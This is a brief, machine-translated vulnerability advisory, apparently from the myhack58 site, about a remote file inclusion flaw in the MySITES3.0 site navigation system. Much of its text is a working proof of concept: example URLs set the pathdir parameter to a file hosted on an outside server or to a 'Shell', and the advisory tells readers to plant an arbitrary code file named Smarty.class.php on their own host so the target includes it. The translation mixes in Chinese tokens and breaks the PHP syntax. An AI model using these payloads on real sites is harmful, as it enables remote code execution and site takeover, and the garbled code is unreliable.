MySITES3. 0 site navigation system remote include vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62201026303
Type myhack58
Reporter 佚名
Modified 2010-03-03T00:00:00


Because the function is not initialized, leading to function can be any of the included files; 1, The register_global=On 2, The allow_url_fopen = On 然后 即可 包含 Poc:www.r0expeR.Net/index.php?pathdir=http://www.r0expeR.Net/xx.txt

<? php $poc = $_GET['pathdir']; echo require_once($poc); poc:http://www. r0expeR. Net/index. php? pathdir=Shell ?& gt;


<? php require_once( $dRootDir."inc/classes/smarty/Smarty.class.php" ); class template extends smarty .......

<>. 自己 的 网站 .com/ On your own website to establish inc/classes/smarty/Smarty.class.php Code any write